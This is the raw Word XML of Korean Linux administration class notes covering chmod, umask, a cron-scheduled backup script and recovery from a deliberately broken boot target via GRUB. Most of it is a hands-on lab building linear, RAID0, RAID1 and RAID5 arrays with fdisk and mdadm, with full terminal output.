    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109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다음 중 파일의 소유자에게 실행 권한을 부여하는 명령이 아닌 것은?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# chmod u+x abc.txt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# chmod 777 abc.txt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# chmod 100 abc.txt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before="0" w:lineRule="auto"/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# chmod o+rwx abc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F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umask </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:spacing w:before="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파일(666) 또는 디렉터리(777) 생성시 기본 권한에서 설정된 권한 만큼을 삭제(제거)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d98662b1hzk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문항1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다음 조건을 만족하는 쉘 스크립트 파일(backup.sh)과 crontab 파일을 제출하시오.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매월 16일 새벽 3시 20분에 /home 디렉터리 전체를 백업해서 /backup 디렉터리에 저장합니다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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백업 파일은 "backup.년.월.일.tar.xz" 형식으로 생성합니다. ( 예: backup.2019.05.21.tar.xz )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백업 기능은 /root/backup.sh 쉘 스크립트 파일로 구현하고, cron에 등록해서 주기적으로 실행합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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쉘 스크립트 파일의 소유자는 root입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:spacing w:before="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/root/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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 $(date)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fname="backup$1$2$3tar.xz"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 cfJ /backup/$fname /home</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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/etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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  03   16    *    *     root    /root/backup.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xuw4ykf8wlmi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Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xuw4ykf8wlmi" w:id="26"/>
      <w:bookmarkEnd w:id="26"/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문제. server 가상머신에서 아래와 같은 상황에 처했을 때 정상 상태로 복구하시오. = 원래처럼 x-windows로 부팅될 수 있도록 수정하세요. (251페이지 참조)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cd /lib/systemd/system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D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root@server:/lib/systemd/system# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l runlevel?.target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lrwxrwxrwx 1 root root 15  5월 25 00:05 runlevel0.target -&gt; poweroff.target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lrwxrwxrwx 1 root root 13  5월 25 00:05 runlevel1.target -&gt; rescue.target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lrwxrwxrwx 1 root root 17  5월 25 00:05 runlevel2.target -&gt; multi-user.target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lrwxrwxrwx 1 root root 17  5월 25 00:05 runlevel3.target -&gt; multi-user.target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lrwxrwxrwx 1 root root 17  5월 25 00:05 runlevel4.target -&gt; multi-user.target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lrwxrwxrwx 1 root root 16  5월 25 00:05 runlevel5.target -&gt; graphical.target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lrwxrwxrwx 1 root root 13  5월 25 00:05 runlevel6.target -&gt; reboot.target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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root@server:/lib/systemd/system# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l default.target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lrwxrwxrwx 1 root root 16  5월 25 00:05 default.target -&gt; graphical.target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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root@server:/lib/systemd/system# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ln -sf runlevel6.target default.target </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138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root@server:/lib/systemd/system# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l default.target </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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lrwxrwxrwx 1 root root 16  5월 29 10:15 default.target -&gt; runlevel6.target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A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root@server:/lib/systemd/system# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot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GRUB 화면에서 "E" 키를 눌러서 편집 모드로 진입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4572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부팅 스크립트에 init=/bin/bash 내용 추가 후 F10 키를 눌러서 부팅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4572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7375650" cy="5537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가상화 프로그램(VMware XXX, Virtual Box, …)을 사용하기 위해서는 CPU의 가상화 기능을 활성화해야 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B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https://www.qnap.com/ko-kr/how-to/faq/article/intel-vt-x%EC%99%80-amd-svm%EC%9D%84-%ED%99%9C%EC%84%B1%ED%99%94%ED%95%98%EB%8A%94-%EB%B0%A9%EB%B2%95/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사물함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7375650" cy="749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350~353 페이지까지 Linear RAID 구축 실습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ls -l /dev/sd* ⇐ HDD 확인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brw-rw---- 1 root disk 8,   0  5월 29 22:50 /dev/sda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brw-rw---- 1 root disk 8,   1  5월 29 22:50 /dev/sda1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brw-rw---- 1 root disk 8,   2  5월 29 22:50 /dev/sda2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brw-rw---- 1 root disk 8,  16  5월 29 22:50 /dev/sdb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brw-rw---- 1 root disk 8,  32  5월 29 22:50 /dev/sdc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brw-rw---- 1 root disk 8,  48  5월 29 22:50 /dev/sdd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brw-rw---- 1 root disk 8,  64  5월 29 22:50 /dev/sde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brw-rw---- 1 root disk 8,  80  5월 29 22:50 /dev/sdf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brw-rw---- 1 root disk 8,  96  5월 29 22:50 /dev/sdg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brw-rw---- 1 root disk 8, 112  5월 29 22:50 /dev/sdh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brw-rw---- 1 root disk 8, 128  5월 29 22:50 /dev/sdi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brw-rw---- 1 root disk 8, 144  5월 29 22:50 /dev/sdj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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fdisk /dev/sdb ⇐ 추가된 HDD를 파티셔닝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Welcome to fdisk (util-linux 2.27.1).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Changes will remain in memory only, until you decide to write them.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Be careful before using the write command.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Device does not contain a recognized partition table.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Created a new DOS disklabel with disk identifier 0x71499664.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Command (m for help): n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Partition type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p   primary (0 primary, 0 extended, 4 free)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e   extended (container for logical partitions)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Select (default p): p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Partition number (1-4, default 1): 1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First sector (2048-4194303, default 2048):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Last sector, +sectors or +size{K,M,G,T,P} (2048-4194303, default 4194303):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Created a new partition 1 of type 'Linux' and of size 2 GiB.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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command (m for help): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t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Selected partition 1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Partition type (type L to list all types): L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0  Empty           24  NEC DOS         81  Minix / old Lin bf  Solaris        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1  FAT12           27  Hidden NTFS Win 82  Linux swap / So c1  DRDOS/sec (FAT-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2  XENIX root      39  Plan 9          83  Linux           c4  DRDOS/sec (FAT-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3  XENIX usr       3c  PartitionMagic  84  OS/2 hidden or  c6  DRDOS/sec (FAT-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4  FAT16 &lt;32M      40  Venix 80286     85  Linux extended  c7  Syrinx         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5  Extended        41  PPC PReP Boot   86  NTFS volume set da  Non-FS data    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6  FAT16           42  SFS             87  NTFS volume set db  CP/M / CTOS / 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7  HPFS/NTFS/exFAT 4d  QNX4.x          88  Linux plaintext de  Dell Utility  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8  AIX             4e  QNX4.x 2nd part 8e  Linux LVM       df  BootIt        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9  AIX bootable    4f  QNX4.x 3rd part 93  Amoeba          e1  DOS access     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a  OS/2 Boot Manag 50  OnTrack DM      94  Amoeba BBT      e3  DOS R/O        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b  W95 FAT32       51  OnTrack DM6 Aux 9f  BSD/OS          e4  SpeedStor     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c  W95 FAT32 (LBA) 52  CP/M            a0  IBM Thinkpad hi ea  Rufus alignment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e  W95 FAT16 (LBA) 53  OnTrack DM6 Aux a5  FreeBSD         eb  BeOS fs        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f  W95 Ext'd (LBA) 54  OnTrackDM6      a6  OpenBSD         ee  GPT           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10  OPUS            55  EZ-Drive        a7  NeXTSTEP        ef  EFI (FAT-12/16/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11  Hidden FAT12    56  Golden Bow      a8  Darwin UFS      f0  Linux/PA-RISC b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12  Compaq diagnost 5c  Priam Edisk     a9  NetBSD          f1  SpeedStor      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14  Hidden FAT16 &lt;3 61  SpeedStor       ab  Darwin boot     f4  SpeedStor      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16  Hidden FAT16    63  GNU HURD or Sys af  HFS / HFS+      f2  DOS secondary  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17  Hidden HPFS/NTF 64  Novell Netware  b7  BSDI fs         fb  VMware VMFS   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18  AST SmartSleep  65  Novell Netware  b8  BSDI swap       fc  VMware VMKCORE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1b  Hidden W95 FAT3 70  DiskSecure Mult bb  Boot Wizard hid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fd  Linux raid auto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1c  Hidden W95 FAT3 75  PC/IX           bc  Acronis FAT32 L fe  LANstep        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1e  Hidden W95 FAT1 80  Old Minix       be  Solaris boot    ff  BBT            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Partition type (type L to list all types): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fd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Changed type of partition 'Linux' to 'Linux raid autodetect'.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Command (m for help): w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The partition table has been altered.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Calling ioctl() to re-read partition table.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Syncing disks.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***** /dev/sdc ~ /dev/sdj 동일하게 파티션 생성 *****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ls /dev/sd*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/dev/sda   /dev/sdb   /dev/sdc1  /dev/sde   /dev/sdf1  /dev/sdh   /dev/sdi1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/dev/sda1  /dev/sdb1  /dev/sdd   /dev/sde1  /dev/sdg   /dev/sdh1  /dev/sdj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/dev/sda2  /dev/sdc   /dev/sdd1  /dev/sdf   /dev/sdg1  /dev/sdi   /dev/sdj1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apt-get install -y mdadm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reboot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************** 스냅샷 생성 **************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fdisk -l /dev/sdb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Disk /dev/sdb: 2 GiB, 2147483648 bytes, 4194304 sectors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Units: sectors of 1 * 512 = 512 bytes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Sector size (logical/physical): 512 bytes / 512 bytes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I/O size (minimum/optimal): 512 bytes / 512 bytes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Disklabel type: dos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Disk identifier: 0x71499664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Device     Boot Start     End Sectors Size Id Type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/dev/sdb1        2048 4194303 4192256   2G fd Linux raid autodetect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3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fdisk -l /dev/sdc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Disk /dev/sdc: 1 GiB, 1073741824 bytes, 2097152 sectors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Units: sectors of 1 * 512 = 512 bytes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Sector size (logical/physical): 512 bytes / 512 bytes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I/O size (minimum/optimal): 512 bytes / 512 bytes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Disklabel type: dos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Disk identifier: 0x87fa3045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Device     Boot Start     End Sectors  Size Id Type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/dev/sdc1        2048 2097151 2095104 1023M fd Linux raid autodetect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--create /dev/md9 --level=linear --raid-devices=2 /dev/sdb1 /dev/sdc1 ⇐ RAID를 구성(생성)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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md9 started.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--scan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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=3953c26d:3e5f2393:67523452:a252342b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mkfs.ext4 /dev/md9 ⇐ 파일 시스템을 지정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mke2fs 1.42.13 (17-May-2015)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Creating filesystem with 785408 4k blocks and 196608 inodes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Filesystem UUID: 15c3eb76-222b-4443-9d17-f714d9389ae3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Superblock backups stored on blocks: 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ab/>
        <w:t xml:space="preserve">32768, 98304, 163840, 229376, 294912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Allocating group tables: done                            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Writing inode tables: done                            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Creating journal (16384 blocks): done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Writing superblocks and filesystem accounting information: done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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mkdir /raidLinear ⇐ 마운트 디렉터리를 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mount /dev/md9 /raidLinear ⇐ 마운트</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3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ls /raidLinear/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lost+found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> df ⇐ 디스크 상태 확인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Filesystem     1K-blocks    Used Available Use% Mounted on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udev              479660       0    479660   0% /dev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tmpfs              99848    6360     93488   7% /run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/dev/sda2       78499768 4400604  70088516   6% /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tmpfs             499232      12    499220   1% /dev/shm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tmpfs               5120       0      5120   0% /run/lock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tmpfs             499232       0    499232   0% /sys/fs/cgroup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tmpfs              99848      36     99812   1% /run/user/0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/dev/sr0         1451056 1451056         0 100% /media/root/Ubuntu 16.04 LTS amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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/dev/md9         3026704    4608   2848632   1% /raidLinear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gedit /etc/fstab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/dev/md9 /raidLinear ext4 defaults 0 0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***** 359페이지 mdadm 버그 때문에 추가 설정 *****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--scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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gedit /etc/mdadm/mdadm.conf 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ARRAY /dev/md9 metadata=1.2 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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cat /etc/mdadm/mdadm.conf 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ab/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ARRAY /dev/md9 metadata=1.2 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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update-initramfs -u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update-initramfs: Generating /boot/initrd.img-4.4.0-21-generic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reboot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354~360페이지 RAID0, RAID1, RAID5 구축 실습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*** RAID0 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB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--create /dev/md0 --level=0 --raid-devices=2 /dev/sdd1 /dev/sde1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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md0 started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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--scan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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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ARRAY /dev/md0 metadata=1.2 name=server:0 UUID=78a7c14b:1a599e89:a493725e:1796a7d6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201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mkfs.ext4 /dev/md0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mke2fs 1.42.13 (17-May-2015)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Creating filesystem with 523264 4k blocks and 130816 inodes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Filesystem UUID: af88ccc3-3021-4bd7-9ead-ebf74dc46bda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Superblock backups stored on blocks: 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ab/>
        <w:t xml:space="preserve">32768, 98304, 163840, 229376, 294912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Allocating group tables: done                            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Writing inode tables: done                            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Creating journal (8192 blocks): done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Writing superblocks and filesystem accounting information: done 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mkdir /raid0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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mount /dev/md0 /raid0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root@server:~# gedit /etc/fstab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/dev/md0 /raid0      ext4 defaults 0 0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*** RAID1 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000213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--create /dev/md1 --level=1 --raid-devices=2 /dev/sdf1 /dev/sdg1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mdadm: Note: this array has metadata at the start and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may not be suitable as a boot device.  If you plan to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store '/boot' on this device please ensure that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your boot-loader understands md/v1.x metadata, or use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--metadata=0.90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000219">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Continue creating array?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md1 started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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--scan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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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ARRAY /dev/md0 metadata=1.2 name=server:0 UUID=78a7c14b:1a599e89:a493725e:1796a7d6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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ARRAY /dev/md1 metadata=1.2 name=server:1 UUID=53fcbd76:1ae32226:e2d2842d:40800aa3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220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mkfs.ext4 /dev/md1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mke2fs 1.42.13 (17-May-2015)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Creating filesystem with 261744 4k blocks and 65536 inodes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Filesystem UUID: 8aacaa16-9fda-40fb-b4e5-682792b0345f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Superblock backups stored on blocks: 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ab/>
        <w:t xml:space="preserve">32768, 98304, 163840, 229376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Allocating group tables: done                            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Writing inode tables: done                            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Creating journal (4096 blocks): done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Writing superblocks and filesystem accounting information: done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mkdir /raid1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022D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mount /dev/md1 /raid1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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gedit /etc/fstab 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/dev/md1 /raid1      ext4 defaults 0 0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*** RAID5 구성 (357페이지 참조)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232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--create /dev/md5 --level=5 --raid-devices=3 /dev/sdh1 /dev/sdi1 /dev/sdj1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mdadm: Defaulting to version 1.2 metadata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mdadm: array /dev/md5 started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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--scan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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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ARRAY /dev/md0 metadata=1.2 name=server:0 UUID=78a7c14b:1a599e89:a493725e:1796a7d6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ARRAY /dev/md1 metadata=1.2 name=server:1 UUID=53fcbd76:1ae32226:e2d2842d:40800aa3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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ARRAY /dev/md5 metadata=1.2 name=server:5 UUID=8d696d8f:187ca2ab:edfa7224:d39a2957</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A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mkfs.ext4 /dev/md5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mke2fs 1.42.13 (17-May-2015)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Creating filesystem with 523264 4k blocks and 130816 inodes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Filesystem UUID: 044e5229-e15e-46d4-8e36-13208a9977d0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Superblock backups stored on blocks: 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ab/>
        <w:t xml:space="preserve">32768, 98304, 163840, 229376, 294912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Allocating group tables: done                            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Writing inode tables: done                            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Creating journal (8192 blocks): done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Writing superblocks and filesystem accounting information: done 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mkdir /raid5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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mount /dev/md5 /raid5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248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df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Filesystem     1K-blocks    Used Available Use% Mounted on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udev              479660       0    479660   0% /dev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tmpfs              99848    6356     93492   7% /run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/dev/sda2       78499768 4401400  70087720   6% /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tmpfs             499232      12    499220   1% /dev/shm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tmpfs               5120       0      5120   0% /run/lock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tmpfs             499232       0    499232   0% /sys/fs/cgroup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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/dev/md9         3026704    4608   2848632   1% /raidLinear ⇒ 2+1 = 3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tmpfs              99848      40     99808   1% /run/user/0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/dev/sr0         1451056 1451056         0 100% /media/root/Ubuntu 16.04 LTS amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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/dev/md0         2027408    3072   1903300   1% /raid0 ⇒ 1 + 1 = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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/dev/md1         1014104    1284    944088   1% /raid1 ⇒ 1 + 1 =&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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/dev/md5         2027408    3072   1903300   1% /raid5 ⇒ 1 + 1 + 1 =&gt; 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256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gedit /etc/fstab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/dev/md5 /raid5      ext4 defaults 0 0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--scan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ARRAY /dev/md9 metadata=1.2 name=server:9 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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ARRAY /dev/md0 metadata=1.2 name=server:0 UUID=78a7c14b:1a599e89:a493725e:1796a7d6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ARRAY /dev/md1 metadata=1.2 name=server:1 UUID=53fcbd76:1ae32226:e2d2842d:40800aa3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ARRAY /dev/md5 metadata=1.2 name=server:5 UUID=8d696d8f:187ca2ab:edfa7224:d39a2957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gedit /etc/mdadm/mdadm.conf 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ARRAY /dev/md9 metadata=1.2 UUID=e4459886:398d4f24:cf8d7d83:963d0d2b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ARRAY /dev/md0 metadata=1.2 UUID=78a7c14b:1a599e89:a493725e:1796a7d6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ARRAY /dev/md1 metadata=1.2 UUID=53fcbd76:1ae32226:e2d2842d:40800aa3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ARRAY /dev/md5 metadata=1.2 UUID=8d696d8f:187ca2ab:edfa7224:d39a2957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update-initramfs -u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update-initramfs: Generating /boot/initrd.img-4.4.0-21-generic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*** 테스트 용도의 파일을 생성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root@server:~# df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Filesystem     1K-blocks    Used Available Use% Mounted on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udev              479660       0    479660   0% /dev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tmpfs              99848    6400     93448   7% /run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/dev/sda2       78499768 4402032  70087088   6% /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tmpfs             499232      12    499220   1% /dev/shm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tmpfs               5120       0      5120   0% /run/lock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tmpfs             499232       0    499232   0% /sys/fs/cgroup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/dev/md0         2027408    3072   1903300   1% /raid0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/dev/md1         1014104    1284    944088   1% /raid1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/dev/md5         2027408    3072   1903300   1% /raid5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/dev/md9         3026704    4608   2848632   1% /raidLinear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tmpfs              99848      36     99812   1% /run/user/0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/dev/sr0         1451056 1451056         0 100% /media/root/Ubuntu 16.04 LTS amd64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root@server:~# 